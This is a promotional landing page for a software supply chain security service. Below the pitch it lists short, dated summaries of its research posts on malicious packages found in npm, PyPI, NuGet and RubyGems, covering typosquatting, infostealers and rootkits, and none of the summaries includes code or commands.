Spectra Assure Community
Find the best building blocks for your next app.
Secure Open Source
Building secure software requires the best of Open Source.
Spectra Assure Community allows you to review the key aspects of software safety before including your next dependency.
Share Assessment Reports
Customers demand software transparency.
Go beyond sharing a simple SBOM. Demonstrate your commitment to building secure software. Share assessments, raise concerns, and triage issues together with your users. Cut the noise and prioritize what matters.
Secure Dev Toolchains
Building secure software relies on trustworthy development toolchains.
Spectra Assure Community allows you to trust the compilers, linkers, IDE plugins and CI/CD pipelines that you use to build apps.
Complete Approach to
Secure Software Supply Chains
Malicious attacks on public open source repositories are now as pervasive as developers' use of open source dependencies. Spectra Assure Community monitors open source packages to identify malware, code tampering and indicators of software supply chain attacks.
Quick guided tour
Learn how our reports helps you make the best choices for keeping your credentials, projects and end-users safe from malicious attacks.
Malicious NuGet campaign uses homoglyphs and IL weaving to fool devs
Jul 11, 2024
Malicious NuGet packages found impersonating legit packages using homoglyphs and injecting malicious functionality using IL weaving.
Malicious npm packages target AWS users
Jun 26, 2024
Dormant package turned malicious only after a few months - malicious actor was trying to pass his malicious package as a legitimate one.
Malicious package with wiper functionality detected in PyPI
Jun 5, 2024
Malicious packages published as part of irresponsible red team activity present a threat to incautious developers and generate noise for security researchers.
Suspicious NuGet package grabs data from industrial systems
Mar 26, 2024
Suspicious package that demonstrates how tiny can the line between industrial espionage and unconventional feature implementation be.
BIPClip: Malicious packages target crypto wallet recovery passwords
Mar 12, 2024
Malware authors try to fool developers looking to implement the Bitcoin Improvement Proposal 39, or BIP39, in order to steal mnemonic phrases used to recover lost or destroyed crypto wallets. The campaign lasted for more than a year with the first malicious package dating back to December, 2022.
Attackers leverage PyPI to sideload malicious DLLs
Feb 20, 2024
Two PyPI packages observed using DLL sideloading to execute code without attracting the attention of security monitoring tools. The attack was carried out by loading malicious code located in an unsigned (and therefore untrusted) DLL from the context of a signed PE executable.
GitHub leveraged to store stolen data
Jan 23, 2024
GitHub is increasingly being used to easily deploy malicious open source software. One novel way is using GitHub to store stolen sensitive data.
Malware leveraging public infrastructure on the rise
Dec 19, 2023
Malware authors occasionally upload their samples to services like Dropbox and Discord to host second stage malware. This time around, GitHub was being abused to issue commands to PyPI malware.
Protestware taps npm to call out wars
Nov 16, 2023
Newly discovered open source software packages on the npm platform contain scripts that broadcast peace messages related to ongoing conflicts in Ukraine and on the Gaza Strip when they are deployed.
IAmReboot: Malicious NuGet packages exploit loophole in MSBuild integrations
Oct 31, 2023
These packages show how threat actors have moved from simple downloaders executing inside install scripts to a more refined approach that exploits NuGet’s MSBuild integrations feature to trigger execution of malicious functionality.
Malicious npm package delivering r77 rootkit
Oct 4, 2023
The letter “s” was all that separated a legitimate npm package from a malicious twin that delivered the open source r77 rootkit — this typosquatting package was downloaded more than 700 times.
VMConnect supply chain attack linked to North Korean threat actors
Aug 31, 2023
PyPI was leveraged to target developers in the first state-sponsored attributed software supply chain attack. The malicious packages mimicked popular open-source Python tools to trick developers into installing them.
Fake Roblox packages target npm with Luna Grabber
Aug 22, 2023
Attackers are increasingly adopting the use of open source malware for their attacks on developers. Similar to the 2021 campaign, fake Roblox packages mimicking a legitimate package noblox.js delivered the open source infostealer Luna Grabber.
Brainleeches - First crossover of phishing and supply chain attacks
Jul 6, 2023
“Write once, infect everywhere” might be the new cybercrime motto, with newly discovered campaigns showing malicious npm packages powering phishing kits and supply chain attacks.
Who checks the contents of compiled Python files?
Jun 1, 2023
In the ever-evolving pursuit of detection evasion, attackers start taking advantage of the fact that Python byte code (PYC) files can be directly executed.
RATs found hiding in the npm attic
May 18, 2023
Combination of suspicious code behaviors draws attention for deeper investigation. Open source packages that contain hard coded IP addresses in their code, while also executing commands and writing data to files, in our experience, usually turn out to be malicious.
Malicious npm package mimics Material Tailwind CSS tool
Sep 23, 2022
The malicious Material Tailwind npm package, has an automatic post-install script, which downloads a password protected zip file that contains a malicious executable: a custom-packed Windows executable capable of running PowerShell scripts.
IconBurst - Escalation of Attacker Tactics
Jul 5, 2022
IconBurst is the first typosquatting attack to trigger the payload only after its host software release package is deployed by unsuspecting users.
Malware Targeting Developer's Credentials
Jul 21, 2021
Typosquatting attacks prey on developers mistyping open source package names. The malicious payload usually steals credentials to pivot through developer toolchains.
Mining for malicious Ruby gems
Apr 16, 2020
“Jim Carrey” and “Peter Gibbons” impersonators join in a barrage of typosquatting malware on RubyGems targeting software repository users. The malicious code was designed to redirect cryptocurrency transactions.